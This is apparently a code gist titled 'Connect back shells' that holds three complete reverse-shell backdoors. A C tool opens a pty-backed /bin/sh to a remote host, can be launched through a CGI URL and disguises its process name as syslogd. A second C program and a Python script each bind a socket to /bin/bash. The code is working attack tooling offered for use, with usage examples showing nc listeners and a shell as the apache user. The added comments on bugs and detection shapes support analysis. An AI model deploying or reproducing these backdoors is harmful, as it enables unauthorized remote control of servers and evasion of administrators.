@wofeiwo
Last active January 7, 2017 11:11
Connect back shells
/*
Connect back tools
compile under linux
2003-07-11 now support FreeBSD ..
now support user define echo value
[bkbll@mobile bkbll]$ uname -a
Linux mobile 2.4.18-3custom #1 三 11月 20 19:46:20 CST 2002 i686 unknown
%uname -a
FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386
[bkbll@mobile ownprog]$ ./cntoltty 192.168.8.110 5555
Connect back tools bye bkbll(bkbll@cnhonker.net)
http://www.cnhonker.net
Trying 192.168.8.110:5555....ok
pid 3304 will manage our request
on the 192.168.8.110:
d:\>nc -l -p 5555
sh-2.05b$
this tool support CGI URL:
such as:
[bkbll@mobile ownprog]$ lynx http://192.168.8.114/cgi-bin/bkbll/....168.8.110:5555
then on 192.168.8.110:
d:\>nc -l -p 5555
sh-2.05b$ id
uid=48(apache) gid=48(apache) groups=48(apache)
sh-2.05b$
*/
#include <stdlib.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <pwd.h>
#include <fcntl.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifndef BSD
/* Linux/x86 ioctl request numbers hard-coded instead of taken from
 * <sys/ioctl.h> (not included by this file); the BSD build expects
 * <termios.h> to provide them. */
#define TIOCSCTTY 0x540E
#define TIOCSPGRP 0x5410
#endif
#define TCSETA 0x5406          /* defined but never used in this file */
#define MAXSIZE 512            /* relay and command buffer size, in bytes */
#define HOST_NAME_LENGTH 40    /* size of the (unused) host_name buffer in exec_command() */
#define ENV_SIZE 2000          /* never used */
/* Written over argv[0] in main() so process listings that read the argv area
 * show this name. Detection note: only argv is rewritten; on Linux the
 * executable path behind /proc/<pid>/exe is not affected by that write. */
#define COMM_MASQ "syslogd -m 1 "
/* Unparenthesised: `MAX(fd,pty)+1` expands to `fd>pty?fd:pty+1`, so the +1
 * binds to the second operand only (see the select() call in exec_command()). */
#define MAX(a,b) a>b?a:b
/* Control-character codes (^Z, ^C, ^\, ^D); none of them is referenced. */
#define SUSP_KEY 0x1A
#define INTR_KEY 0x03
#define QUIT_KEY 0x1C
#define VEOF_KEY 0x04
#define VERSION "1.0"
/* Pre-C99 habit; <errno.h> is already included above, and on modern libcs
 * errno is a macro, so this redeclaration is at best redundant. */
extern int errno;
/* have_pt_head : CGI Content-type header already sent (see pt_head()).
 * cgicn        : 1 when running as a CGI (REQUEST_METHOD set), 0 from the CLI.
 * not_execu    : never read anywhere.
 * ifecho       : 1 when "-e" was given; main() labels this "Open echo on tty". */
int have_pt_head=0,cgicn=0,not_execu=1,ifecho=0;
/* Exactly one byte, no room for a NUL terminator: commonexec() writes it
 * with write(fd,prompt,1), never as a C string. */
char prompt[1]="$";
struct termios parentterm;   /* filled by tcgetattr(2,...) in main(); never read afterwards */
/* Environment handed to /bin/sh via execle(): in exec_command() when cgicn is
 * set, and always in commonexec(). It imitates an Apache service account's
 * environment; every value is fixed at compile time and says nothing about
 * the real host. */
char *argenv_t[]={
"HOSTNAME=mobile",
"LANG=en_US",
"LESSOPEN=|/usr/bin/lesspipe.sh %s",
"USER=apache",
"LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:",
"INPUTRC=/etc/inputrc",
"LOGNAME=apache",
"SHLVL=1",
"SHELL=/bin/sh",
"HISTSIZE=0",
"TERM=xterm",
"PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/usr/sbin:/sbin"
};
/* Forward declarations. Several are unprototyped (empty parentheses) even
 * though the definitions and calls below pass arguments. */
int commonexec(int fd,char *argenv[]);
int usetty(int *pty,int *tty,char *ttyname);
int client_connect(int sockfd,char* server,int port);
void exec_command(int);
void print_ver();
void pt_head();
void pt_htmlhead();
void pt_htmlend();
/*
 * Entry point. Two invocation modes share the second half of the function:
 *   CLI : argv[1] = host, argv[2] = port, optional argv[3] = "-e".
 *   CGI : taken when argc <= 2 and REQUEST_METHOD is set; host, port and an
 *         optional "-e" are parsed out of QUERY_STRING ("host:port[:-e]") and
 *         all output is wrapped in a minimal HTML page.
 * It then connects out to host:port, overwrites argv[0] with COMM_MASQ, forks,
 * and the child hands the socket to exec_command() while the parent prints the
 * child's pid and exits.
 *
 * The return type is omitted (implicit int, pre-C99) and nothing is returned.
 * The third parameter `env` is never used.
 */
main(int argc,char *argv[],char **env)
{
int target_port,clisocket;
/* Pointers are stored in these below: truncates on 64-bit (LP64) targets. */
unsigned int a,b,c;
struct sockaddr_in client;   /* unused */
struct hostent *host;        /* unused */
int pid;
char action[31],target_host[20];
char *p;
if((argc>2) || (getenv("REQUEST_METHOD")==NULL))
{ /* not cgi connect */
print_ver("");
if(argc<3){printf("Usage:%s <host> <port> [-e]\r\n",argv[0]);exit(0);}
target_port=atoi(argv[2]);   /* no range check; atoi() yields 0 on non-numeric input */
cgicn=0;
if ((argc > 3) && (strcmp("-e",argv[3])==0))
ifecho=1;
}
else
{
pt_head();
pt_htmlhead();
print_ver("<br>");
if(strncasecmp(getenv("REQUEST_METHOD"),"get",3)!=0)
{
printf("Only support get REQUEST_METHOD\r\n");
pt_htmlend();   /* exits the process */
}
//memcpy(user_from_ip,getenv("REMOTE_ADDR"),15);
/* Copies a fixed 30 bytes regardless of the real length of QUERY_STRING:
 * a shorter query string is over-read, and action[] is never
 * NUL-terminated here (action[30] stays uninitialised), so the
 * index()/rindex()/atoi() calls below may scan beyond the copied data. */
memcpy(action,getenv("QUERY_STRING"),30);
a=(unsigned int)action;
if(index(action,':')==NULL) {printf("syntax error,for example:http://xxx.com/cgi-bin/cnto?192.168.7.110:53:-e\r\n");pt_htmlend();}
b=(unsigned int)index(action,':');   /* legacy index()/rindex() == strchr()/strrchr() */
c=(b-a)>19?19:(b-a);   /* clamp the host part so it fits target_host[20] */
memcpy(target_host,action,c);
target_host[c]=0; // get the host
target_port=atoi((char *)b+1); //get the port
//have the -e value?
//printf("the string:%s<br>\r\n",(char*)(b+1));
/* rindex() returns the LAST ':'; with a single ':' that is the port
 * separator, the comparison fails and ifecho stays 0. */
if((p=rindex(action,':'))!=NULL)
{
//printf("after cmp:%s<br>\r\n",p+1);
if(strcmp(p+1,"-e")==0) ifecho=1;
}
cgicn=1;
}
/* creat socket to other host */
/* A socket() failure is only reported; execution continues with clisocket < 0. */
if((clisocket=socket(AF_INET,SOCK_STREAM,0))<0) {perror("creat socket error");}
//printf("cgicn=%d,Trying connect \r\n",cgicn);
if(cgicn)
{
/* pt_htmlend() exits, so the close()/exit(0) after it never run. */
if(client_connect(clisocket,(char *)target_host,target_port)<0){pt_htmlend();close(clisocket);exit(0);}
}
else
{
if(client_connect(clisocket,(char *)argv[1],target_port)<0){close(clisocket);exit(0);}
}
/* Process-name masquerade: sizeof(COMM_MASQ) (14 bytes including the NUL) is
 * written over argv[0] no matter how long argv[0] actually is, so a shorter
 * argv[0] means the write spills past it. Only the argv area changes; the
 * running image (/proc/<pid>/exe on Linux) is not. */
memcpy(argv[0],COMM_MASQ,sizeof(COMM_MASQ));
signal(SIGCHLD,SIG_IGN);    /* children are reaped automatically */
tcgetattr(2,&parentterm);   /* saved but never used (the only consumer is commented out) */
pid = fork();
/* A failed fork() (pid == -1) also takes this branch and reports "pid -1". */
if (pid !=0 )
{
if(cgicn)
printf("<br>\r\n");
if(ifecho ==1 )
printf("Open echo on tty\r\n");
else
{
printf("Close echo on tty\r\n");
}
if(cgicn)
printf("<br>\r\n");
printf("pid %d will manage our request\r\n", pid);
//wait(NULL);
if(cgicn)
pt_htmlend();
exit(0);
}
/* Child: serve the shell over the socket, then sign off. */
exec_command(clisocket);
write(clisocket,"See u again\r\n",13);
close(clisocket);
}
/*
 * Serve an interactive /bin/sh over the connected socket `fd` through a
 * pseudo-terminal.
 *
 * usetty() picks a legacy BSD-style pty pair; if none can be opened the
 * pty-less fallback commonexec() is used instead. Otherwise a child is forked
 * that becomes a session leader on the slave tty and execs sh, while this
 * process loops relaying bytes between the pty master and `fd` until either
 * side reports EOF or an error.
 *
 * Resulting host-side shape (useful when looking for this): a session-leader
 * `sh -ip` whose fds 0,1,2 are a pty slave, parented by a process that holds
 * the matching pty master plus an outbound TCP socket and whose argv[0] was
 * rewritten by main().
 *
 * ioctl() is called without <sys/ioctl.h> being included in this file.
 *
 * @param fd  connected TCP socket; left open here for the caller to close,
 *            but closed inside the shell child before exec.
 */
void exec_command(int fd)
{
int pid,pid2,i,pty,tty,read1,read2;   /* pid2 and i are unused */
char host_name[HOST_NAME_LENGTH],tmpbuf[MAXSIZE],buffer1[MAXSIZE],buffer2[MAXSIZE];   /* host_name, tmpbuf unused */
struct passwd *user_info;   /* unused */
fd_set readfd;
struct termios oldterm,newterm;
char ttyname[20];   /* slave path filled by usetty(); shadows ttyname(3) from <unistd.h> */
if(usetty(&pty,&tty,ttyname)<0)
{
printf("Cannot fork tty\r\n");
commonexec(fd,argenv_t);   /* degraded mode: one `sh -c` per received chunk, no tty */
return;
}
//setsid();
/* A failed fork() (pid == -1) is not detected; the relay loop below would
 * then run with no shell attached. */
pid=fork();
if(pid==0)
{
/* Child: start a new session, then reopen the slave by name so TIOCSCTTY
 * can make it the controlling terminal of that session. */
setsid();
tty=open(ttyname,O_RDWR);
ioctl(tty, TIOCSCTTY);
//tcsetattr(tty,TCSANOW,&parentterm);
pid=getpid();
ioctl (tty, TIOCSPGRP, &pid);   /* foreground process group := this process */
tcgetattr(tty,&oldterm);
if(ifecho == 0)
{
/* Default: no canonical input, no echo, no signal or extended
 * control characters. */
newterm = oldterm;
newterm.c_lflag &= ~(ICANON | ECHO | ISIG |IEXTEN );
tcsetattr(tty,TCSANOW,&newterm);
}
else
{
/* "-e" mode: canonical input and signal characters are switched on,
 * but ECHO itself is not set here — the slave keeps whatever it had. */
newterm = oldterm;
newterm.c_lflag |= ICANON | ISIG | IEXTEN ;
tcsetattr(tty,TCSANOW,&newterm);
}
/* close local part of connection */
close(fd);   /* the shell only ever sees the tty, never the socket */
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);   /* undo main()'s SIG_IGN so sh can wait for its own children */
//dup2(fd,tty);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
close(pty);
/* In CGI mode the shell receives the fixed argenv_t environment instead of
 * the web server's. "-i" is interactive mode; "-p" is the shell's
 * privileged mode (see the shell's manual). */
if(cgicn)
execle("/bin/sh","sh","-ip",NULL,argenv_t);
else
execl("/bin/sh","sh","-ip",NULL);
/* No _exit() here: if exec fails the child falls through and runs the
 * relay loop below as a second copy. */
}
#ifndef BSD
close(tty);   /* parent keeps only the master; BSD builds close the slave after the loop */
#endif
memset(buffer1,0,MAXSIZE);
memset(buffer2,0,MAXSIZE);
//write(pty,"alias ls='ls --color'\r\n",strlen("alias ls='ls --color'\r\n"));
/* Relay loop: pty master <-> socket, one read/write per ready descriptor. */
while (1)
{
/* watch tty and client side */
FD_ZERO(&readfd);
FD_SET(pty, &readfd);
FD_SET(fd, &readfd);
/* MAX is unparenthesised, so this expands to fd>pty?fd:pty+1: the +1 is
 * applied only when pty is the larger descriptor, which is typically the
 * case here because the socket was created before the pty was opened. */
if (select(MAX(fd,pty)+1,&readfd, NULL, NULL, NULL) < 0)break;
if (FD_ISSET(pty, &readfd))
{
read1 = read(pty, buffer1, MAXSIZE);
if (read1 <= 0) break;   /* shell exited / pty closed */
if (write(fd, buffer1, read1) <= 0) break;   /* a short write is treated as success */
memset(buffer1,0,MAXSIZE);   /* not needed for correctness: read1 bounds the write */
}
if (FD_ISSET(fd, &readfd))
{
read2 = read(fd, buffer2, MAXSIZE);
if (read2 <= 0) break;   /* peer closed the connection */
if (write(pty, buffer2, read2) <= 0) break;
memset(buffer2,0,MAXSIZE);
}
}
#ifdef BSD
close(tty);
#endif
close(pty);
return;
}
/*
 * Print the two-line program banner to stdout.
 *
 * @param tags  markup appended to each line: "" from the CLI, "<br>" in CGI
 *              mode so the lines break inside the HTML page.
 */
void print_ver(char *tags)
{
const char *version = VERSION;
fprintf(stdout, "Connect back tools(%s) bye bkbll(bkbll@cnhonker.net)%s\r\n", version, tags);
fprintf(stdout, "http://www.cnhonker.net%s%s\r\n\r\n", tags, tags);
}
/*
 * Resolve `server` and connect `sockfd` to server:port (IPv4 only).
 *
 * Progress and error text goes to stdout — in CGI mode that is the HTTP
 * response body. The socket is neither created nor closed here.
 *
 * @param sockfd  an already created AF_INET/SOCK_STREAM socket
 * @param server  hostname or dotted-quad address
 * @param port    TCP port as an int; values outside 0..65535 are not
 *                rejected, htons() simply truncates them
 * @return 0 on success, -1 if name resolution or connect() fails
 */
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
/* gethostbyname(3) is the legacy resolver: IPv4 only, and only the first
 * returned address is used. */
if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}
/* Zeroes sizeof(struct sockaddr) rather than sizeof cliaddr; the two are the
 * same 16 bytes on the usual platforms. */
bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("Trying %s:%d....",server,port);
fflush(stdout);   /* make the "Trying" text visible while connect() blocks */
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
return(-1);
}
printf("ok\r\n");
return(0);
}
/*
 * Find a free legacy (BSD-style) pseudo-terminal pair.
 *
 * Probes /dev/pty<X><Y> for X in "pqrstuwxyzabcde" (note: no 'v') and Y in
 * "0123456789abcdef", opening the master first and then the matching
 * /dev/tty<X><Y> slave. Systems that provide only Unix98 ptys (/dev/ptmx)
 * may have none of these nodes; then -1 is returned and the caller falls
 * back to commonexec().
 *
 * @param pty      out: open master descriptor on success
 * @param tty      out: open slave descriptor on success
 * @param ttyname  out: slave path "/dev/ttyXY" (11 bytes incl. NUL); storage
 *                 is the caller's (exec_command() passes a char[20]). The
 *                 parameter name shadows ttyname(3) from <unistd.h>.
 * @return 0 on success, -1 if no pair could be opened
 *
 * Known leak: when the master opens but the slave does not, *pty is not
 * closed before the loop moves on to the next candidate.
 */
int usetty(int *pty,int *tty,char *ttyname)
{
char series[] = "pqrstuwxyzabcde";
char subs[] = "0123456789abcdef";
char ptynm[]="/dev/pty";
char ttynm[]="/dev/tty";
int i,j,slen,sublen,a;
char ptyname[20];
strcpy(ptyname,ptynm);
strcpy(ttyname,ttynm);
a=strlen(ptynm);   /* index at which the two-character suffix is written */
sublen=strlen(subs);
slen=strlen(series);
//printf("fork tty...\r\n");
//a=sublen=strlen(ttynm);
for(i=0;i<slen;i++)
{
//printf("fork tty...\r\n");
for(j=0;j<sublen;j++)
{
/* Build both names in lock-step: /dev/pty<X><Y> and /dev/tty<X><Y>. */
ttyname[a]=ptyname[a]=series[i];
ttyname[a+1]=ptyname[a+1]=subs[j];
ttyname[a+2]=ptyname[a+2]=0;
#ifdef DEBUG
printf("check pty:%s........",ptyname);
fflush(stdout);
#endif
*pty=open(ptyname,O_RDWR);   /* master busy or absent -> try the next one */
if(*pty<0)
{
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
#ifdef sun
else
{
/* Solaris: a master whose TIOCGPGRP succeeds, or fails with anything
 * other than EIO, is treated as already in use. */
int pgrp_rtn;
if (ioctl(*pty, TIOCGPGRP, &pgrp_rtn) == 0 || errno != EIO)
{
close(*pty);
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
}
#endif
#ifdef DEBUG
printf("open it\r\n");
printf("check tty:%s........",ttyname);
fflush(stdout);
#endif
*tty=open(ttyname,O_RDWR);
if(*tty<0)
{
/* *pty remains open here (descriptor leak, see header comment). */
#ifdef DEBUG
printf("failed\r\n");
#endif
continue;
}
#ifdef DEBUG
printf("open it\r\n");
#endif
return(0);
}
}
return(-1);
}
/*
 * Pty-less fallback used when usetty() fails.
 *
 * Writes the one-byte prompt, then for each chunk read from `fd`: if it
 * begins with "exit" the loop ends; otherwise a child is forked with its
 * stdio bound to `fd` and the chunk is handed to `/bin/sh -c` with the
 * environment `argenv`. The parent waits for that child and prompts again.
 *
 * @param fd      connected socket, used for input and as the command's stdio
 * @param argenv  environment for execle(); the only caller passes argenv_t
 * @return 0 after "exit". The two bare `return;` statements below return no
 *         value from an int function; the only caller ignores the result.
 */
int commonexec(int fd,char *argenv[])
{
int result,read1,need_exec,pid;   /* need_exec is assigned but never read */
fd_set readfd;
char read_in[MAXSIZE],exec_result[MAXSIZE];   /* exec_result is unused */
if(write(fd,prompt,1)<1){printf("write to client error;%s\r\n",strerror(errno));}
while(1)
{
FD_ZERO(&readfd);
FD_SET(fd,&readfd);
need_exec=1;
result=select(fd+1,&readfd,NULL,NULL,NULL);
if(result<0){printf("select error\r\n");return;}
if(FD_ISSET(fd,&readfd))
{
/* read() does not NUL-terminate: read_in is uninitialised beyond the
 * bytes received on the first pass, is memset only after a command has
 * run, and a full MAXSIZE read leaves no terminator at all — so the
 * string given to `sh -c` below can extend past the received data. The
 * client's trailing newline is passed through as part of the command. */
read1=read(fd,read_in,MAXSIZE);
if(read1<=0)return;   /* peer closed or read error */
/* fork a child to exec the command */
//printf("read_in=%s<br>\r\n",read_in);
if(memcmp(read_in,"exit",4)==0){break;}   /* any chunk starting with "exit" ends the session */
pid=fork();
if(pid==0) //child process
{
dup2(fd,0);
dup2(fd,1);
dup2(fd,2);
execle("/bin/sh","/bin/sh","-c",read_in,NULL,argenv);
/* No _exit() on exec failure: the child would continue this loop as a
 * second reader on fd. */
}
waitpid(pid,NULL,0);   /* a fork() failure (pid == -1) is passed straight through */
memset(read_in,0,MAXSIZE);
if(write(fd,prompt,1)<1){perror("write to client error");}
}
}
return(0);
}
/*
 * Emit the CGI Content-type header exactly once per process.
 *
 * The file-level flag have_pt_head records that the header has been sent,
 * so any later call is a no-op.
 */
void pt_head()
{
if (have_pt_head)
return;
fputs("Content-type:text/html\r\n\r\n", stdout);
have_pt_head = 1;
}
/*
 * Write the opening of the minimal HTML page used for CGI responses
 * (html, head, title, body) to stdout.
 */
void pt_htmlhead()
{
static const char *const opening[] = {
"<html>\r\n",
"<head>\r\n",
"<title>cgi connect back</title>\r\n",
"</head>\r\n",
"<body>\r\n",
};
unsigned k;
for (k = 0; k < sizeof opening / sizeof opening[0]; k++)
fputs(opening[k], stdout);
}
/*
 * Close the HTML page and terminate the process with exit status 1.
 * Never returns.
 */
void pt_htmlend()
{
fputs("</body>\r\n", stdout);
fputs("</html>\r\n", stdout);
exit(1);
}
/*
*******************************************************
** Connect_Back Backdoor
** Modified by wofeiwo <wofeiwo[0x40]gmail[0x2E]com>
** Date: Jun 14th 2006
*******************************************************
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
/* Unprototyped declaration: main() passes a char*, while the definition
 * below declares its parameter as char *[] (see usage()). */
void usage();
char shell[]="/bin/bash";   /* program exec'd once fds 0,1,2 are bound to the socket */
/* Banner sent as the first bytes over the connection. send() uses
 * sizeof(message), so the trailing NUL goes over the wire as well. */
char message[]="-------------------[ Welcome to shell ]------------------\n"
"----------------------[ Enjoy it :) ]--------------------\n";
int sock;   /* the outbound TCP socket; global but only used by main() */
/*
 * Stand-alone connect-back: connect a TCP socket to argv[1]:argv[2], send the
 * banner, bind stdin/stdout/stderr to the socket and exec /bin/bash.
 *
 * Nothing after execl() runs unless the exec itself fails. exit() and atoi()
 * are used although <stdlib.h> is not included, and inet_addr() although
 * <arpa/inet.h> is not — all rely on implicit declarations.
 *
 * Host-side shape: a bash process whose fds 0,1,2 — and the original `sock`
 * descriptor, which is not closed before exec — are one outbound TCP socket.
 *
 * @return 1, and only when execl() fails
 */
int main(int argc, char *argv[])
{
if(argc <3)
{
usage(argv[0]);   /* exits; argv[0] is a char*, the definition takes char *[] */
}
struct sockaddr_in server;   /* not zero-initialised; sin_zero is left as-is */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[-] Couldn't make socket!\n");   /* diagnostics go to stdout, not stderr */
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(atoi(argv[2]));   /* port is not validated */
/* inet_addr() takes dotted-quad only (no name resolution) and its failure
 * value INADDR_NONE is not checked. */
server.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
{
printf("[-] Could not connect to remote shell!\n");
exit(-1);
}
send(sock, message, sizeof(message), 0);   /* includes the trailing NUL; result ignored */
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/bash",(char *)0);
close(sock);   /* reached only when execl() fails */
return 1;
}
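/*
 * Print the banner and command-line usage for the stand-alone program, then
 * terminate the process. Never returns (exit status -1, i.e. 255 as seen by
 * a shell).
 *
 * @param pname  argv[0] of the running program, shown in the usage line.
 *               The original declared this as `char *pname[]` (a char**) and
 *               printed it with %s while the only caller, main(), passes
 *               argv[0] (a char*): a format/argument type mismatch. The
 *               parameter is now `char *`, which matches both the caller
 *               and the format specifier.
 */
void usage(char *pname)
{
printf("Connect back door\n\n");
printf("Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>\n");
printf("Date: Jun 15th 2006\n\n");
printf("Usage: %s <reflect ip> <port>\n\n", pname);
exit(-1);
}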
#!/usr/bin/env python
#coding=utf-8
# Python Connect-back Backdoor
# Author: wofeiwo@80sec.com
# Version: 1.1
# Date: July 15th 2006
# Last Modified: August 17th 2009
import sys
import os
import pty
import socket
shell = "/bin/bash"  # program handed to pty.spawn() once fds 0,1,2 are bound to the socket
def usage(programname):
    """Print the banner and command-line usage to stdout.

    Does not exit; main() calls sys.exit right after it.
    programname -- argv[0], shown in the usage line.
    (Python 2 print statements.)
    """
    print "Python Connect-back Backdoor"
    print "Date: August 17th 2009\n"
    print "Usage: %s <conn_back_host> <port>\n" % programname
def main():
    """Connect to <conn_back_host>:<port>, bind fds 0/1/2 to the socket and
    run `shell` under a pseudo-terminal via pty.spawn().

    Exit codes: 1 for a wrong argument count, 2 when the connection fails.
    pty.spawn() returns when the shell exits; the socket is then closed.
    Host-side shape: a bash whose controlling pty is driven by a python
    process whose own fds 0,1,2 are one outbound TCP socket.
    """
    if len(sys.argv) != 3:
        usage(sys.argv[0])
        sys.exit(1)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # gethostbyname is IPv4-only; a non-numeric port makes int() raise,
        # which the bare except below reports as a connection failure.
        s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
        print "[+] Connect ok."
    except:
        # Bare except: also swallows KeyboardInterrupt and hides the real error.
        print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2])
        sys.exit(2)
    # Banner; the number of bytes actually sent is not checked.
    s.send("-------------------- Python Connect-back Backdoor --------------------\n")
    # From here on stdin/stdout/stderr of this process (and of the spawned
    # shell's parent side) are the TCP socket.
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    global shell  # redundant: shell is only read here, never assigned
    pty.spawn(shell)
    print "See U!"  # written to the socket, since fd 1 was redirected above
    s.close()
if __name__ == "__main__": main()  # script entry point